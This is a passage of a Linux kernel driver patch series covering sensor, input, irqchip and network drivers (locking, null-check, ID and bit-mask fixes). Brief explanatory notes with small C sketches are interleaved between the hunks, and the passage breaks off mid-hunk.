+index d5ea1a1be1226..a492e8f2fc0fb 100644
+--- a/drivers/iio/dac/ad3552r.c
++++ b/drivers/iio/dac/ad3552r.c
+@@ -140,8 +140,8 @@ enum ad3552r_ch_vref_select {
+ };
+ 
+ enum ad3542r_id {
+-	AD3542R_ID = 0x4008,
+-	AD3552R_ID = 0x4009,
++	AD3542R_ID = 0x4009,
++	AD3552R_ID = 0x4008,
+ };
+ 
+ enum ad3552r_ch_output_range {
+diff --git a/drivers/iio/frequency/admv1013.c b/drivers/iio/frequency/admv1013.c
+index e6311213f3e89..d15b85377159b 100644
+--- a/drivers/iio/frequency/admv1013.c
++++ b/drivers/iio/frequency/admv1013.c
+@@ -351,9 +351,9 @@ static int admv1013_update_mixer_vgate(struct admv1013_state *st)
+ 	if (vcm < 0)
+ 		return vcm;
+ 
+-	if (vcm < 1800000)
++	if (vcm <= 1800000)
+ 		mixer_vgate = (2389 * vcm / 1000000 + 8100) / 100;
+-	else if (vcm > 1800000 && vcm < 2600000)
++	else if (vcm > 1800000 && vcm <= 2600000)
+ 		mixer_vgate = (2375 * vcm / 1000000 + 125) / 100;
+ 	else
+ 		return -EINVAL;
+diff --git a/drivers/iio/imu/bno055/Kconfig b/drivers/iio/imu/bno055/Kconfig
+index fa79b1ac4f85b..83e53acfbe880 100644
+--- a/drivers/iio/imu/bno055/Kconfig
++++ b/drivers/iio/imu/bno055/Kconfig
+@@ -2,6 +2,8 @@
+ 
+ config BOSCH_BNO055
+ 	tristate
++	select IIO_BUFFER
++	select IIO_TRIGGERED_BUFFER
+ 
+ config BOSCH_BNO055_SERIAL
+ 	tristate "Bosch BNO055 attached via UART"
+diff --git a/drivers/iio/pressure/bmp280-core.c b/drivers/iio/pressure/bmp280-core.c
+index c0aff78489b46..4c867157aa968 100644
+--- a/drivers/iio/pressure/bmp280-core.c
++++ b/drivers/iio/pressure/bmp280-core.c
+@@ -1786,7 +1786,7 @@ int bmp280_common_probe(struct device *dev,
+ 	 * however as it happens, the BMP085 shares the chip ID of BMP180
+ 	 * so we look for an IRQ if we have that.
+ 	 */
+-	if (irq > 0 || (chip_id  == BMP180_CHIP_ID)) {
++	if (irq > 0 && (chip_id  == BMP180_CHIP_ID)) {
+ 		ret = bmp085_fetch_eoc_irq(dev, name, irq, data);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/iio/pressure/dps310.c b/drivers/iio/pressure/dps310.c
+index 984a3f511a1ae..db1b1e48225aa 100644
+--- a/drivers/iio/pressure/dps310.c
++++ b/drivers/iio/pressure/dps310.c
+@@ -57,8 +57,8 @@
+ #define  DPS310_RESET_MAGIC	0x09
+ #define DPS310_COEF_BASE	0x10
+ 
+-/* Make sure sleep time is <= 20ms for usleep_range */
+-#define DPS310_POLL_SLEEP_US(t)		min(20000, (t) / 8)
++/* Make sure sleep time is <= 30ms for usleep_range */
++#define DPS310_POLL_SLEEP_US(t)		min(30000, (t) / 8)
+ /* Silently handle error in rate value here */
+ #define DPS310_POLL_TIMEOUT_US(rc)	((rc) <= 0 ? 1000000 : 1000000 / (rc))
+ 
+@@ -402,8 +402,8 @@ static int dps310_reset_wait(struct dps310_data *data)
+ 	if (rc)
+ 		return rc;
+ 
+-	/* Wait for device chip access: 2.5ms in specification */
+-	usleep_range(2500, 12000);
++	/* Wait for device chip access: 15ms in specification */
++	usleep_range(15000, 55000);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/iio/pressure/ms5611_core.c b/drivers/iio/pressure/ms5611_core.c
+index c564a1d6cafe8..44cfdbedcfaab 100644
+--- a/drivers/iio/pressure/ms5611_core.c
++++ b/drivers/iio/pressure/ms5611_core.c
+@@ -76,7 +76,7 @@ static bool ms5611_prom_is_valid(u16 *prom, size_t len)
+ 
+ 	crc = (crc >> 12) & 0x000F;
+ 
+-	return crc_orig != 0x0000 && crc == crc_orig;
++	return crc == crc_orig;
+ }
+ 
+ static int ms5611_read_prom(struct iio_dev *indio_dev)
+diff --git a/drivers/infiniband/hw/cxgb4/cm.c b/drivers/infiniband/hw/cxgb4/cm.c
+index ced615b5ea096..040ba2224f9ff 100644
+--- a/drivers/infiniband/hw/cxgb4/cm.c
++++ b/drivers/infiniband/hw/cxgb4/cm.c
+@@ -1965,6 +1965,9 @@ static int send_fw_act_open_req(struct c4iw_ep *ep, unsigned int atid)
+ 	int win;
+ 
+ 	skb = get_skb(NULL, sizeof(*req), GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
++
+ 	req = __skb_put_zero(skb, sizeof(*req));
+ 	req->op_compl = htonl(WR_OP_V(FW_OFLD_CONNECTION_WR));
+ 	req->len16_pkd = htonl(FW_WR_LEN16_V(DIV_ROUND_UP(sizeof(*req), 16)));
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 76cbcca13c9e9..c19a4d2023805 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -272,6 +272,7 @@ static const struct xpad_device {
+ 	{ 0x1038, 0x1430, "SteelSeries Stratus Duo", 0, XTYPE_XBOX360 },
+ 	{ 0x1038, 0x1431, "SteelSeries Stratus Duo", 0, XTYPE_XBOX360 },
+ 	{ 0x11c9, 0x55f0, "Nacon GC-100XF", 0, XTYPE_XBOX360 },
++	{ 0x11ff, 0x0511, "PXN V900", 0, XTYPE_XBOX360 },
+ 	{ 0x1209, 0x2882, "Ardwiino Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x12ab, 0x0004, "Honey Bee Xbox360 dancepad", MAP_DPAD_TO_BUTTONS, XTYPE_XBOX360 },
+ 	{ 0x12ab, 0x0301, "PDP AFTERGLOW AX.1", 0, XTYPE_XBOX360 },
+@@ -474,6 +475,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOXONE_VENDOR(0x0f0d),		/* Hori Controllers */
+ 	XPAD_XBOX360_VENDOR(0x1038),		/* SteelSeries Controllers */
+ 	XPAD_XBOX360_VENDOR(0x11c9),		/* Nacon GC100XF */
++	XPAD_XBOX360_VENDOR(0x11ff),		/* PXN V900 */
+ 	XPAD_XBOX360_VENDOR(0x1209),		/* Ardwiino Controllers */
+ 	XPAD_XBOX360_VENDOR(0x12ab),		/* X-Box 360 dance pads */
+ 	XPAD_XBOX360_VENDOR(0x1430),		/* RedOctane X-Box 360 controllers */
+diff --git a/drivers/input/misc/powermate.c b/drivers/input/misc/powermate.c
+index c1c733a9cb890..db2ba89adaefa 100644
+--- a/drivers/input/misc/powermate.c
++++ b/drivers/input/misc/powermate.c
+@@ -425,6 +425,7 @@ static void powermate_disconnect(struct usb_interface *intf)
+ 		pm->requires_update = 0;
+ 		usb_kill_urb(pm->irq);
+ 		input_unregister_device(pm->input);
++		usb_kill_urb(pm->config);
+ 		usb_free_urb(pm->irq);
+ 		usb_free_urb(pm->config);
+ 		powermate_free_buffers(interface_to_usbdev(intf), pm);
+diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c
+index 2118b2075f437..4e38229404b4b 100644
+--- a/drivers/input/mouse/elantech.c
++++ b/drivers/input/mouse/elantech.c
+@@ -2114,6 +2114,7 @@ static int elantech_setup_ps2(struct psmouse *psmouse,
+ 	psmouse->protocol_handler = elantech_process_byte;
+ 	psmouse->disconnect = elantech_disconnect;
+ 	psmouse->reconnect = elantech_reconnect;
++	psmouse->fast_reconnect = NULL;
+ 	psmouse->pktsize = info->hw_version > 1 ? 6 : 4;
+ 
+ 	return 0;
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index fa021af8506e4..d2c9f4cbd00c6 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -1623,6 +1623,7 @@ static int synaptics_init_ps2(struct psmouse *psmouse,
+ 	psmouse->set_rate = synaptics_set_rate;
+ 	psmouse->disconnect = synaptics_disconnect;
+ 	psmouse->reconnect = synaptics_reconnect;
++	psmouse->fast_reconnect = NULL;
+ 	psmouse->cleanup = synaptics_reset;
+ 	/* Synaptics can usually stay in sync without extra help */
+ 	psmouse->resync_time = 0;
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 1724d6cb8649d..9c39553d30fa2 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -618,6 +618,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook E5411 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU CLIENT COMPUTING LIMITED"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK E5411"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index 25e575183dd18..3f0732db7bf5b 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -900,6 +900,25 @@ static int goodix_add_acpi_gpio_mappings(struct goodix_ts_data *ts)
+ 		dev_info(dev, "No ACPI GpioInt resource, assuming that the GPIO order is reset, int\n");
+ 		ts->irq_pin_access_method = IRQ_PIN_ACCESS_ACPI_GPIO;
+ 		gpio_mapping = acpi_goodix_int_last_gpios;
++	} else if (ts->gpio_count == 1 && ts->gpio_int_idx == 0) {
++		/*
++		 * On newer devices there is only 1 GpioInt resource and _PS0
++		 * does the whole reset sequence for us.
++		 */
++		acpi_device_fix_up_power(ACPI_COMPANION(dev));
++
++		/*
++		 * Before the _PS0 call the int GPIO may have been in output
++		 * mode and the call should have put the int GPIO in input mode,
++		 * but the GPIO subsys cached state may still think it is
++		 * in output mode, causing gpiochip_lock_as_irq() failure.
++		 *
++		 * Add a mapping for the int GPIO to make the
++		 * gpiod_int = gpiod_get(..., GPIOD_IN) call succeed,
++		 * which will explicitly set the direction to input.
++		 */
++		ts->irq_pin_access_method = IRQ_PIN_ACCESS_NONE;
++		gpio_mapping = acpi_goodix_int_first_gpios;
+ 	} else {
+ 		dev_warn(dev, "Unexpected ACPI resources: gpio_count %d, gpio_int_idx %d\n",
+ 			 ts->gpio_count, ts->gpio_int_idx);
+diff --git a/drivers/irqchip/irq-renesas-rzg2l.c b/drivers/irqchip/irq-renesas-rzg2l.c
+index 25fd8ee66565b..10c3e85c90c23 100644
+--- a/drivers/irqchip/irq-renesas-rzg2l.c
++++ b/drivers/irqchip/irq-renesas-rzg2l.c
+@@ -118,7 +118,7 @@ static void rzg2l_irqc_irq_disable(struct irq_data *d)
+ 
+ 		raw_spin_lock(&priv->lock);
+ 		reg = readl_relaxed(priv->base + TSSR(tssr_index));
+-		reg &= ~(TSSEL_MASK << tssr_offset);
++		reg &= ~(TSSEL_MASK << TSSEL_SHIFT(tssr_offset));
+ 		writel_relaxed(reg, priv->base + TSSR(tssr_index));
+ 		raw_spin_unlock(&priv->lock);
+ 	}
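
A note on the one-line fix above: tssr_offset is a field index within the TSSR register, so the mask must be shifted by the field's bit position, which is what TSSEL_SHIFT() computes. A minimal standalone sketch of the difference, using stand-in macro values rather than the driver's real definitions:

#include <stdint.h>
#include <stdio.h>

#define TSSEL_MASK          0x7F
#define TSSEL_SHIFT(off)    (8 * (off))   /* field index -> bit position */

int main(void)
{
    uint32_t reg = 0x12345678;
    unsigned int offset = 2;              /* third 8-bit field */

    /* Buggy: shifts the mask by the field *index*, clearing bits 2..8. */
    uint32_t buggy = reg & ~((uint32_t)TSSEL_MASK << offset);

    /* Fixed: shifts by the field's bit position, clearing bits 16..22. */
    uint32_t fixed = reg & ~((uint32_t)TSSEL_MASK << TSSEL_SHIFT(offset));

    printf("buggy=%08x fixed=%08x\n", (unsigned)buggy, (unsigned)fixed);
    return 0;
}

With the raw index, the wrong bits (straddling a neighbouring field) get cleared; with the computed shift, exactly the intended field is cleared.
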
+diff --git a/drivers/mcb/mcb-core.c b/drivers/mcb/mcb-core.c
+index b8ad4f16b4acd..e7b6989d8b4a8 100644
+--- a/drivers/mcb/mcb-core.c
++++ b/drivers/mcb/mcb-core.c
+@@ -387,17 +387,13 @@ EXPORT_SYMBOL_NS_GPL(mcb_free_dev, MCB);
+ 
+ static int __mcb_bus_add_devices(struct device *dev, void *data)
+ {
+-	struct mcb_device *mdev = to_mcb_device(dev);
+ 	int retval;
+ 
+-	if (mdev->is_added)
+-		return 0;
+-
+ 	retval = device_attach(dev);
+-	if (retval < 0)
++	if (retval < 0) {
+ 		dev_err(dev, "Error adding device (%d)\n", retval);
+-
+-	mdev->is_added = true;
++		return retval;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index aa6938da0db85..c41cbacc75a2c 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -99,8 +99,6 @@ static int chameleon_parse_gdd(struct mcb_bus *bus,
+ 	mdev->mem.end = mdev->mem.start + size - 1;
+ 	mdev->mem.flags = IORESOURCE_MEM;
+ 
+-	mdev->is_added = false;
+-
+ 	ret = mcb_device_register(bus, mdev);
+ 	if (ret < 0)
+ 		goto err;
+diff --git a/drivers/net/can/Kconfig b/drivers/net/can/Kconfig
+index 8236aabebb394..e45b95a13157b 100644
+--- a/drivers/net/can/Kconfig
++++ b/drivers/net/can/Kconfig
+@@ -174,7 +174,7 @@ config CAN_SLCAN
+ 
+ config CAN_SUN4I
+ 	tristate "Allwinner A10 CAN controller"
+-	depends on MACH_SUN4I || MACH_SUN7I || RISCV || COMPILE_TEST
++	depends on MACH_SUN4I || MACH_SUN7I || (RISCV && ARCH_SUNXI) || COMPILE_TEST
+ 	help
+ 	  Say Y here if you want to use CAN controller found on Allwinner
+ 	  A10/A20/D1 SoCs.
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index b3f7988668996..1e94ba1031ece 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -544,6 +544,15 @@ qca8k_phy_eth_command(struct qca8k_priv *priv, bool read, int phy,
+ 		goto err_read_skb;
+ 	}
+ 
++	/* It seems that accessing the switch's internal PHYs via management
++	 * packets still uses the MDIO bus within the switch internally, and
++	 * these accesses can conflict with external MDIO accesses to other
++	 * devices on the MDIO bus.
++	 * We therefore need to lock the MDIO bus onto which the switch is
++	 * connected.
++	 */
++	mutex_lock(&priv->bus->mdio_lock);
++
+ 	/* Actually start the request:
+ 	 * 1. Send mdio master packet
+ 	 * 2. Busy Wait for mdio master command
+@@ -556,6 +565,7 @@ qca8k_phy_eth_command(struct qca8k_priv *priv, bool read, int phy,
+ 	mgmt_master = priv->mgmt_master;
+ 	if (!mgmt_master) {
+ 		mutex_unlock(&mgmt_eth_data->mutex);
++		mutex_unlock(&priv->bus->mdio_lock);
+ 		ret = -EINVAL;
+ 		goto err_mgmt_master;
+ 	}
+@@ -643,6 +653,7 @@ exit:
+ 				    QCA8K_ETHERNET_TIMEOUT);
+ 
+ 	mutex_unlock(&mgmt_eth_data->mutex);
++	mutex_unlock(&priv->bus->mdio_lock);
+ 
+ 	return ret;
+ 
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+index 29cc609880712..ea88ac04ab9ad 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+@@ -28,6 +28,9 @@ static inline void ixgbe_alloc_vf_macvlans(struct ixgbe_adapter *adapter,
+ 	struct vf_macvlans *mv_list;
+ 	int num_vf_macvlans, i;
+ 
++	/* Initialize list of VF macvlans */
++	INIT_LIST_HEAD(&adapter->vf_mvs.l);
++
+ 	num_vf_macvlans = hw->mac.num_rar_entries -
+ 			  (IXGBE_MAX_PF_MACVLANS + 1 + num_vfs);
+ 	if (!num_vf_macvlans)
+@@ -36,8 +39,6 @@ static inline void ixgbe_alloc_vf_macvlans(struct ixgbe_adapter *adapter,
+ 	mv_list = kcalloc(num_vf_macvlans, sizeof(struct vf_macvlans),
+ 			  GFP_KERNEL);
+ 	if (mv_list) {
+-		/* Initialize list of VF macvlans */
+-		INIT_LIST_HEAD(&adapter->vf_mvs.l);
+ 		for (i = 0; i < num_vf_macvlans; i++) {
+ 			mv_list[i].vf = -1;
+ 			mv_list[i].free = true;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index 0f8f3ce35537d..a7832a0180ee6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -611,7 +611,7 @@ static int mlx5e_macsec_upd_txsa(struct macsec_context *ctx)
+ 		goto out;
+ 	}
+ 
+-	if (tx_sa->next_pn != ctx_tx_sa->next_pn_halves.lower) {
++	if (ctx->sa.update_pn) {
+ 		netdev_err(netdev, "MACsec offload: update TX sa %d PN isn't supported\n",
+ 			   assoc_num);
+ 		err = -EINVAL;
+@@ -1016,7 +1016,7 @@ static int mlx5e_macsec_upd_rxsa(struct macsec_context *ctx)
+ 		goto out;
+ 	}
+ 
+-	if (rx_sa->next_pn != ctx_rx_sa->next_pn_halves.lower) {
++	if (ctx->sa.update_pn) {
+ 		netdev_err(ctx->netdev,
+ 			   "MACsec offload update RX sa %d PN isn't supported\n",
+ 			   assoc_num);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 4e7daa382bc05..42e6f2fcf5f59 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -3862,13 +3862,14 @@ static int set_feature_rx_fcs(struct net_device *netdev, bool enable)
+ 	struct mlx5e_channels *chs = &priv->channels;
+ 	struct mlx5e_params new_params;
+ 	int err;
++	bool rx_ts_over_crc = !enable;
+ 
+ 	mutex_lock(&priv->state_lock);
+ 
+ 	new_params = chs->params;
+ 	new_params.scatter_fcs_en = enable;
+ 	err = mlx5e_safe_switch_params(priv, &new_params, mlx5e_set_rx_port_ts_wrap,
+-				       &new_params.scatter_fcs_en, true);
++				       &rx_ts_over_crc, true);
+ 	mutex_unlock(&priv->state_lock);
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c
+index d309b77a01944..cdd8818b49d0a 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c
+@@ -308,8 +308,8 @@ const struct mlxsw_sp_nve_ops mlxsw_sp1_nve_vxlan_ops = {
+ 	.fdb_clear_offload = mlxsw_sp_nve_vxlan_clear_offload,
+ };
+ 
+-static bool mlxsw_sp2_nve_vxlan_learning_set(struct mlxsw_sp *mlxsw_sp,
+-					     bool learning_en)
++static int mlxsw_sp2_nve_vxlan_learning_set(struct mlxsw_sp *mlxsw_sp,
++					    bool learning_en)
+ {
+ 	char tnpc_pl[MLXSW_REG_TNPC_LEN];
+ 
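
The return-type change above is more than cosmetic: the function hands back negative errno values, and squeezing those through a bool turns every failure into plain 'true', so the error code is lost before the caller ever sees it. A standalone demonstration of the failure mode:

#include <stdbool.h>
#include <stdio.h>

static bool set_learning_bool(void) { return -5; }  /* -EIO squeezed into bool */
static int  set_learning_int(void)  { return -5; }

int main(void)
{
    bool b = set_learning_bool();
    int  i = set_learning_int();

    printf("as bool: %d (errno lost, 'err < 0' never fires)\n", b);
    printf("as int:  %d (errno preserved)\n", i);
    return 0;
}
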
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index 4f4204432aaa3..b751b03eddfb1 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -1003,17 +1003,21 @@ static void mana_poll_tx_cq(struct mana_cq *cq)
+ 		case CQE_TX_VPORT_IDX_OUT_OF_RANGE:
+ 		case CQE_TX_VPORT_DISABLED:
+ 		case CQE_TX_VLAN_TAGGING_VIOLATION:
+-			WARN_ONCE(1, "TX: CQE error %d: ignored.\n",
+-				  cqe_oob->cqe_hdr.cqe_type);
++			if (net_ratelimit())
++				netdev_err(ndev, "TX: CQE error %d\n",
++					   cqe_oob->cqe_hdr.cqe_type);
++
+ 			break;
+ 
+ 		default:
+-			/* If the CQE type is unexpected, log an error, assert,
+-			 * and go through the error path.
++			/* If the CQE type is unknown, log an error,
++			 * and still free the SKB, update tail, etc.
+ 			 */
+-			WARN_ONCE(1, "TX: Unexpected CQE type %d: HW BUG?\n",
+-				  cqe_oob->cqe_hdr.cqe_type);
+-			return;
++			if (net_ratelimit())
++				netdev_err(ndev, "TX: unknown CQE type %d\n",
++					   cqe_oob->cqe_hdr.cqe_type);
++
++			break;
+ 		}
+ 
+ 		if (WARN_ON_ONCE(txq->gdma_txq_id != completions[i].wq_num))
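
Two things change in the hunk above: the log is rate-limited instead of one-shot, and the unknown-CQE branch now falls through to the normal completion path instead of returning early. The sketch below re-creates the rate-limiting idea in plain C; the five-messages-per-second policy is an assumption for illustration, not the kernel's actual net_ratelimit() tunables:

#include <stdio.h>
#include <time.h>

static int log_ratelimit(void)
{
    static time_t window_start;
    static int used;
    time_t now = time(NULL);

    if (now != window_start) {  /* new one-second window */
        window_start = now;
        used = 0;
    }
    if (used >= 5)
        return 0;               /* suppressed */
    used++;
    return 1;
}

int main(void)
{
    for (int i = 0; i < 20; i++)
        if (log_ratelimit())
            printf("TX: CQE error %d\n", i);
    return 0;
}
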
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/cmsg.c b/drivers/net/ethernet/netronome/nfp/flower/cmsg.c
+index f21cf1f40f987..153533cd8f086 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/cmsg.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/cmsg.c
+@@ -210,6 +210,7 @@ nfp_flower_cmsg_merge_hint_rx(struct nfp_app *app, struct sk_buff *skb)
+ 	unsigned int msg_len = nfp_flower_cmsg_get_data_len(skb);
+ 	struct nfp_flower_cmsg_merge_hint *msg;
+ 	struct nfp_fl_payload *sub_flows[2];
++	struct nfp_flower_priv *priv;
+ 	int err, i, flow_cnt;
+ 
+ 	msg = nfp_flower_cmsg_get_data(skb);
+@@ -228,14 +229,15 @@ nfp_flower_cmsg_merge_hint_rx(struct nfp_app *app, struct sk_buff *skb)
+ 		return;
+ 	}
+ 
+-	rtnl_lock();
++	priv = app->priv;
++	mutex_lock(&priv->nfp_fl_lock);
+ 	for (i = 0; i < flow_cnt; i++) {
+ 		u32 ctx = be32_to_cpu(msg->flow[i].host_ctx);
+ 
+ 		sub_flows[i] = nfp_flower_get_fl_payload_from_ctx(app, ctx);
+ 		if (!sub_flows[i]) {
+ 			nfp_flower_cmsg_warn(app, "Invalid flow in merge hint\n");
+-			goto err_rtnl_unlock;
++			goto err_mutex_unlock;
+ 		}
+ 	}
+ 
+@@ -244,8 +246,8 @@ nfp_flower_cmsg_merge_hint_rx(struct nfp_app *app, struct sk_buff *skb)
+ 	if (err == -ENOMEM)
+ 		nfp_flower_cmsg_warn(app, "Flow merge memory fail.\n");
+ 
+-err_rtnl_unlock:
+-	rtnl_unlock();
++err_mutex_unlock:
++	mutex_unlock(&priv->nfp_fl_lock);
+ }
+ 
+ static void
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+index f693119541d55..f7492be452aed 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+@@ -1971,8 +1971,6 @@ nfp_fl_ct_offload_nft_flow(struct nfp_fl_ct_zone_entry *zt, struct flow_cls_offl
+ 	struct nfp_fl_ct_flow_entry *ct_entry;
+ 	struct netlink_ext_ack *extack = NULL;
+ 
+-	ASSERT_RTNL();
+-
+ 	extack = flow->common.extack;
+ 	switch (flow->command) {
+ 	case FLOW_CLS_REPLACE:
+@@ -2015,9 +2013,13 @@ int nfp_fl_ct_handle_nft_flow(enum tc_setup_type type, void *type_data, void *cb
+ 
+ 	switch (type) {
+ 	case TC_SETUP_CLSFLOWER:
+-		rtnl_lock();
++		while (!mutex_trylock(&zt->priv->nfp_fl_lock)) {
++			if (!zt->nft) /* avoid deadlock */
++				return err;
++			msleep(20);
++		}
+ 		err = nfp_fl_ct_offload_nft_flow(zt, flow);
+-		rtnl_unlock();
++		mutex_unlock(&zt->priv->nfp_fl_lock);
+ 		break;
+ 	default:
+ 		return -EOPNOTSUPP;
+@@ -2045,6 +2047,7 @@ int nfp_fl_ct_del_flow(struct nfp_fl_ct_map_entry *ct_map_ent)
+ 	struct nfp_fl_ct_flow_entry *ct_entry;
+ 	struct nfp_fl_ct_zone_entry *zt;
+ 	struct rhashtable *m_table;
++	struct nf_flowtable *nft;
+ 
+ 	if (!ct_map_ent)
+ 		return -ENOENT;
+@@ -2061,8 +2064,12 @@ int nfp_fl_ct_del_flow(struct nfp_fl_ct_map_entry *ct_map_ent)
+ 		nfp_fl_ct_clean_flow_entry(ct_entry);
+ 		kfree(ct_map_ent);
+ 
+-		if (!zt->pre_ct_count) {
+-			zt->nft = NULL;
++		if (!zt->pre_ct_count && zt->nft) {
++			nft = zt->nft;
++			zt->nft = NULL; /* avoid deadlock */
++			nf_flow_table_offload_del_cb(nft,
++						     nfp_fl_ct_handle_nft_flow,
++						     zt);
+ 			nfp_fl_ct_clean_nft_entries(zt);
+ 		}
+ 		break;
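
The trylock loop above exists because nfp_fl_ct_del_flow() can hold nfp_fl_lock while tearing down this very callback; blocking on the mutex there would deadlock, so the callback polls and gives up once zt->nft has been cleared. A hypothetical userspace analog of the pattern (not driver code):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <unistd.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static volatile bool active = true;

static int offload_cb(void)
{
    while (pthread_mutex_trylock(&lock) != 0) {
        if (!active)
            return -1;      /* teardown owns the lock: bail out */
        usleep(20000);      /* back off, mirrors msleep(20) */
    }
    puts("offload work done under lock");
    pthread_mutex_unlock(&lock);
    return 0;
}

static void *teardown(void *arg)
{
    (void)arg;
    pthread_mutex_lock(&lock);
    active = false;         /* signal callers not to wait for us */
    sleep(1);               /* slow teardown while holding the lock */
    pthread_mutex_unlock(&lock);
    return NULL;
}

int main(void)
{
    pthread_t t;

    pthread_create(&t, NULL, teardown, NULL);
    usleep(100000);         /* let teardown take the lock first */
    printf("callback -> %d\n", offload_cb());
    pthread_join(t, NULL);
    return 0;
}
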
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/main.h b/drivers/net/ethernet/netronome/nfp/flower/main.h
+index cb799d18682d9..d0ab71ce3d84f 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/main.h
++++ b/drivers/net/ethernet/netronome/nfp/flower/main.h
+@@ -281,6 +281,7 @@ struct nfp_fl_internal_ports {
+  * @predt_list:		List to keep track of decap pretun flows
+  * @neigh_table:	Table to keep track of neighbor entries
+  * @predt_lock:		Lock to serialise predt/neigh table updates
++ * @nfp_fl_lock:	Lock to protect the flow offload operation
+  */
+ struct nfp_flower_priv {
+ 	struct nfp_app *app;
+@@ -323,6 +324,7 @@ struct nfp_flower_priv {
+ 	struct list_head predt_list;
+ 	struct rhashtable neigh_table;
+ 	spinlock_t predt_lock; /* Lock to serialise predt/neigh table updates */
++	struct mutex nfp_fl_lock; /* Protect the flow operation */
+ };
+ 
+ /**
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/metadata.c b/drivers/net/ethernet/netronome/nfp/flower/metadata.c
+index 0f06ef6e24bf4..80e4675582bfb 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/metadata.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/metadata.c
+@@ -528,6 +528,8 @@ int nfp_flower_metadata_init(struct nfp_app *app, u64 host_ctx_count,
+ 	if (err)
+ 		goto err_free_stats_ctx_table;
+ 
++	mutex_init(&priv->nfp_fl_lock);
++
+ 	err = rhashtable_init(&priv->ct_zone_table, &nfp_zone_table_params);
+ 	if (err)
+ 		goto err_free_merge_table;
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/offload.c b/drivers/net/ethernet/netronome/nfp/flower/offload.c
+index 8593cafa63683..99165694f1367 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/offload.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/offload.c
+@@ -1009,8 +1009,6 @@ int nfp_flower_merge_offloaded_flows(struct nfp_app *app,
+ 	u64 parent_ctx = 0;
+ 	int err;
+ 
+-	ASSERT_RTNL();
+-
+ 	if (sub_flow1 == sub_flow2 ||
+ 	    nfp_flower_is_merge_flow(sub_flow1) ||
+ 	    nfp_flower_is_merge_flow(sub_flow2))
+@@ -1727,19 +1725,30 @@ static int
+ nfp_flower_repr_offload(struct nfp_app *app, struct net_device *netdev,
+ 			struct flow_cls_offload *flower)
+ {
++	struct nfp_flower_priv *priv = app->priv;
++	int ret;
++
